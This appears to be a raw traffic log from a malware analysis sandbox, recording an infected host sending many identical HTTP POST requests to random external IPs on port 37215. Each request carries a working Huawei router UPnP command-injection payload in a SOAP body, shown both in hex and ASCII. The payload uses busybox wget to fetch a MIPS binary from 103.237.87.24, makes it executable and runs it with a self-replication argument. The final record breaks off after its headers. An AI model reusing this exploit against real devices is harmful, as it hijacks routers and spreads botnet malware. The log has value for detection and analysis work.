3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2038192.168.2.135321476.240.160.8137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.575211048 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2039192.168.2.134996290.28.69.4337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.575229883 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2040192.168.2.1349380115.168.0.7037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.575244904 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2041192.168.2.1349532197.23.136.7337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.575270891 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2042192.168.2.1349894157.32.245.3137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.575280905 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2043192.168.2.1345164197.178.16.2437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.575294971 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2044192.168.2.133787041.150.4.23937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.575294018 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2045192.168.2.1340758197.79.149.7837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.575314045 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2046192.168.2.1347162192.206.146.20037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.575325012 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2047192.168.2.1340274197.0.30.15237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.575341940 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2048192.168.2.1347108157.38.75.1037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.575364113 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
